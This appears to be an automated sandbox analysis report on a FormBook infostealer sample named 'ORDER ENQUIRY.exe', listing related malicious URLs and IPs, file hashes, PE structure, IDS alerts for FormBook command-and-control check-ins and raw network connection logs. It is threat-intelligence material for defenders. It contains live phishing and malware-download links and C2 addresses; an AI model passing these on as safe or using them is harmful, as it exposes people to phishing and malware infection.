                                                                                                                                                                        uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                        • 154.85.183.50
                                                                                                                                                                        SecuriteInfo.com.Linux.Siggen.9999.8352.26322.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 156.235.217.93
                                                                                                                                                                        AMAZONEXPANSIONGBhttp://www.aieov.com/setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 3.33.243.145
                                                                                                                                                                        https://www.afghanhayatrestaurant.com.au/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 3.33.243.145
                                                                                                                                                                        https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 3.33.220.150
                                                                                                                                                                        https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 3.33.220.150
                                                                                                                                                                        https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 3.33.220.150
                                                                                                                                                                        https://www.allegiantair.com/deals//smsgiveawayGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 52.223.40.198
                                                                                                                                                                        z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 3.33.130.190
                                                                                                                                                                        update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 3.33.130.190
                                                                                                                                                                        https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 52.223.40.198
                                                                                                                                                                        https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 3.33.220.150
                                                                                                                                                                        BODIS-NJUShttps://tracking.groovesell.com:443/t/1c336171327d66d10a047ef8cbabb880Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        https://pokerfanboy.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        https://mx1.margarettaphilomena.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.59.243.205
                                                                                                                                                                        https://conbassecomlogii.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        https://kuconlogin-ui.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        SecuriteInfo.com.suspected.of.Trojan.Downloader.gen.13209.11014.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        nBjauMrrmC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        https://41619ec8e8407cbea965833e1fb35e027cd895bdef33c8d4bb7a06d460.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        https://b47324b31aa4ee0c39345febbbd635556bd7b07a0995b64436378baed7.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        http://f41aff2909cfd057585b1f61d87df66d8a0613f5ce2d194125c00f2c2f.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                        CLOUDFLARENETUSRFQ-00032035.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                        Shipping Documents.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 172.67.216.244
                                                                                                                                                                        po110-11#U3000Sip_KAHRAMANKAZAN AS %100% S51105P-E01 #Uff08fiyati teklifi#Uff09IMG .exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        https://u47214858.ct.sendgrid.net/ls/click?upn=u001.c4dv-2BqJoebtefwT8NPLgxJhEAMFjIETH3I3Q8CNmlUyiUmttbZn0qPd3YBU1FvM-2FTPZQ0Ny-2FjdR-2FE-2F7zRj1y6P-2FWlxAyLuXYXbYHvhJ5g8KGiVmaicte80xV-2Bl3IZC9tXXFR_qqk8pzmFTqXgUqmijN8NLgkwBDr0C-2Barb6A8p6EP2vzfFIYXQXZPUsC69-2F89CrBr6pqEhlk-2Bm2kXZ9T2yO-2F2wXq53tvBzsea7EyzJ8-2FeaRjYTKe8296LUx3dR165pmE81l4ZlyCckh6XAStB7X6mpZG1eDt2Z2hE9lreTf4zUu15BHkFWIQD6l06j98sSmxefpIhKrPbp1sHqorvnsLfTlqgy97iDW5x7jEFHBjvW3kB67l3ddnWvdhOAQtXJjvxkBTHzOZ1xmNB-2F-2BJv2yxw-2BZ118sFXhzW7kT0jCD4nVA53ptg-2FlDPfE3xlZZV9CMctrTJ1N8IAj5d062XIpZOe3B3qxw6lRc-2FlE4u0JOetbEvf0rjlMWcXfPEqpotI-2F2oVP9HyepyGLoftfNEm6SwBOFPsaNp7O-2BtHor7tHsI-2B0toVkv4rP0i-2Br0nrtV4hMR-2FdhpHoJiQMDnEQt4HkwhputltaAXkVwiAgeKUBKMe5BZPlwbFaY695vWxuBA8sXYlfIlA2nH2OTZtq4olwBYb-2B2OH7O0v7kh9lZbdG-2FR7aHKFdYLoQNSTKRWoXOCWruqXPTLLwScg4q6t45M9fA06bOcDeidFPVNDK-2FWFzDkHMQLFcxNpkS3T2MKWPAPYmVVSF-2FYvR-2FCjme44RBe4WqMVRDyINtH-2BCgXVuhmhyhlxqnQJQ3khWyNBODdBzIgWx7SJHQER1-2BQIENitwqgFbxnEHVgdtauGxq3b7b9C-2BkO-2BOeMHOIaRwA-2BSx45dj5rG-2BfMrbH9xwp2AcUmYUCFe15mQPKLSUbdkG53z-2BRi6KQYCNPyauzai9f2rlpGdEnSU7g8yhbiAHqaWchhGFREcCHEMvyZXxkCNwEjj7wKionbQnEVTNY1chMS4frV68nYnZpRS4eFq1F-2BziFy5Fu7I-2BEGiv2g-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        63670000.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.78.54
                                                                                                                                                                        63670000.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 172.67.216.244
                                                                                                                                                                        Scan Order and Specification 01-10- 2024.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 172.67.216.244
                                                                                                                                                                        https://app.getresponse.com/change_details.html?x=a62b&m=BrgFNl&s=BW9rcZD&u=C3YQM&z=EMkQID6&pt=change_detailsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.16.160.168
                                                                                                                                                                        http://www.aieov.com/setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 172.67.41.60
                                                                                                                                                                        https://docs.zoom.us/doc/qMqlDrh-RUWwdmI-mAClTgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 104.18.95.41
                                                                                                                                                                        No context
                                                                                                                                                                        No context
                                                                                                                                                                        Process:C:\Users\user\Desktop\ORDER ENQUIRY.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.706229588765733
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                        File name:ORDER ENQUIRY.exe
                                                                                                                                                                        File size:695'808 bytes
                                                                                                                                                                        MD5:754fa726ba767c17ebbce69e967d40ca
                                                                                                                                                                        SHA1:b011ef478a435e685c3180d10c1c25bbc58ce105
                                                                                                                                                                        SHA256:79bcad797129c0be508de0fe7b0462b1aaffbafa74a4e7019a4561deb674f4bd
                                                                                                                                                                        SHA512:ad6b237579b0d4f9993e0894a6923882243df1d3b7722fb9496962dfd6c5b7a7828e7ff4d6b4c8adba621e58ffdd6dc33bb3dc9650ec461fa457a50785217177
                                                                                                                                                                        SSDEEP:12288:dE3YCt5VADTdLpS8UMYw3Etz44KBvC3eimLMXm:dwYCmLpS9k3E944Ko3eiUF
                                                                                                                                                                        TLSH:1EE4E0E03F3A7319DE685A30D639EDF552A51D687040BAE319DD3B8779AD211AE0CF02
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T.f..............0..|... ........... ........@.. ....................................@................................
                                                                                                                                                                        Icon Hash:0f6dedc9c9cc6d0f
                                                                                                                                                                        Entrypoint:0x4a9a2e
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x66FB54B0 [Tue Oct 1 01:47:28 2024 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:4
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                        Instruction
                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa99dc0x4f.text
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x1d88.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xa86740x54.text
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x20000xa7a340xa7c003b7993e3d72f0717fbf70e90344553a3False0.8597053721125186data7.71035451108767IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0xaa0000x1d880x1e00a530d502432feb2a23f8b6e058a367dcFalse0.8955729166666667data7.419320783478042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0xac0000xc0x200e155361f528c5c938bfc3de759032b95False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_ICON0xaa0c80x1a49PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9655223658790311
                                                                                                                                                                        RT_GROUP_ICON0xabb240x14data1.05
                                                                                                                                                                        RT_VERSION0xabb480x23cdata0.4755244755244755
                                                                                                                                                                        DLLImport
                                                                                                                                                                        mscoree.dll_CorExeMain
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549724151.101.0.11980TCP
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549724151.101.0.11980TCP
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549724151.101.0.11980TCP
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.5497223.33.130.19080TCP
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549723154.197.185.22080TCP
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.5497223.33.130.19080TCP
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.5497223.33.130.19080TCP
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549723154.197.185.22080TCP
                                                                                                                                                                        2024-10-01T10:05:00.616006+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549723154.197.185.22080TCP
                                                                                                                                                                        2024-10-01T10:06:02.624066+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549719199.59.243.22780TCP
                                                                                                                                                                        2024-10-01T10:06:02.624066+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549719199.59.243.22780TCP
                                                                                                                                                                        2024-10-01T10:06:02.624066+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549719199.59.243.22780TCP
                                                                                                                                                                        2024-10-01T10:06:22.816992+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549720154.221.68.22980TCP
                                                                                                                                                                        2024-10-01T10:06:22.816992+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549720154.221.68.22980TCP
                                                                                                                                                                        2024-10-01T10:06:22.816992+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549720154.221.68.22980TCP
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 1, 2024 10:05:41.535798073 CEST4971780192.168.2.523.227.38.74
                                                                                                                                                                        Oct 1, 2024 10:05:41.540694952 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:05:41.540769100 CEST4971780192.168.2.523.227.38.74
                                                                                                                                                                        Oct 1, 2024 10:05:41.540818930 CEST4971780192.168.2.523.227.38.74
                                                                                                                                                                        Oct 1, 2024 10:05:41.545613050 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:05:42.014441013 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:05:42.014470100 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:05:42.014481068 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:05:42.014487028 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:05:42.014494896 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:05:42.014617920 CEST4971780192.168.2.523.227.38.74
                                                                                                                                                                        Oct 1, 2024 10:05:42.014658928 CEST4971780192.168.2.523.227.38.74
                                                                                                                                                                        Oct 1, 2024 10:05:42.017079115 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:05:42.017158031 CEST4971780192.168.2.523.227.38.74
                                                                                                                                                                        Oct 1, 2024 10:05:42.019597054 CEST804971723.227.38.74192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:02.156209946 CEST4971980192.168.2.5199.59.243.227
                                                                                                                                                                        Oct 1, 2024 10:06:02.161019087 CEST8049719199.59.243.227192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:02.161109924 CEST4971980192.168.2.5199.59.243.227
                                                                                                                                                                        Oct 1, 2024 10:06:02.161168098 CEST4971980192.168.2.5199.59.243.227
                                                                                                                                                                        Oct 1, 2024 10:06:02.165966034 CEST8049719199.59.243.227192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:02.623742104 CEST8049719199.59.243.227192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:02.623873949 CEST8049719199.59.243.227192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:02.623883963 CEST8049719199.59.243.227192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:02.623898029 CEST8049719199.59.243.227192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:02.623939991 CEST4971980192.168.2.5199.59.243.227
                                                                                                                                                                        Oct 1, 2024 10:06:02.623986006 CEST4971980192.168.2.5199.59.243.227
                                                                                                                                                                        Oct 1, 2024 10:06:02.624066114 CEST4971980192.168.2.5199.59.243.227
                                                                                                                                                                        Oct 1, 2024 10:06:22.224080086 CEST4972080192.168.2.5154.221.68.229
                                                                                                                                                                        Oct 1, 2024 10:06:22.228899956 CEST8049720154.221.68.229192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:22.229005098 CEST4972080192.168.2.5154.221.68.229
                                                                                                                                                                        Oct 1, 2024 10:06:22.229118109 CEST4972080192.168.2.5154.221.68.229
                                                                                                                                                                        Oct 1, 2024 10:06:22.233830929 CEST8049720154.221.68.229192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:22.752557993 CEST4972080192.168.2.5154.221.68.229
                                                                                                                                                                        Oct 1, 2024 10:06:22.802907944 CEST8049720154.221.68.229192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:22.815110922 CEST8049720154.221.68.229192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:22.816992044 CEST4972080192.168.2.5154.221.68.229
                                                                                                                                                                        Oct 1, 2024 10:06:42.225301981 CEST4972280192.168.2.53.33.130.190
                                                                                                                                                                        Oct 1, 2024 10:06:42.230139971 CEST80497223.33.130.190192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:42.230231047 CEST4972280192.168.2.53.33.130.190
                                                                                                                                                                        Oct 1, 2024 10:06:42.230340958 CEST4972280192.168.2.53.33.130.190
                                                                                                                                                                        Oct 1, 2024 10:06:42.235476017 CEST80497223.33.130.190192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:42.704962015 CEST80497223.33.130.190192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:42.705210924 CEST80497223.33.130.190192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:42.708774090 CEST4972280192.168.2.53.33.130.190
                                                                                                                                                                        Oct 1, 2024 10:06:42.708863020 CEST4972280192.168.2.53.33.130.190
                                                                                                                                                                        Oct 1, 2024 10:06:42.713825941 CEST80497223.33.130.190192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:07:23.564651966 CEST4972380192.168.2.5154.197.185.220
                                                                                                                                                                        Oct 1, 2024 10:07:23.569710016 CEST8049723154.197.185.220192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:07:23.571885109 CEST4972380192.168.2.5154.197.185.220
                                                                                                                                                                        Oct 1, 2024 10:07:23.571968079 CEST4972380192.168.2.5154.197.185.220
                                                                                                                                                                        Oct 1, 2024 10:07:23.576785088 CEST8049723154.197.185.220192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:07:24.055922985 CEST8049723154.197.185.220192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:07:24.056010962 CEST4972380192.168.2.5154.197.185.220
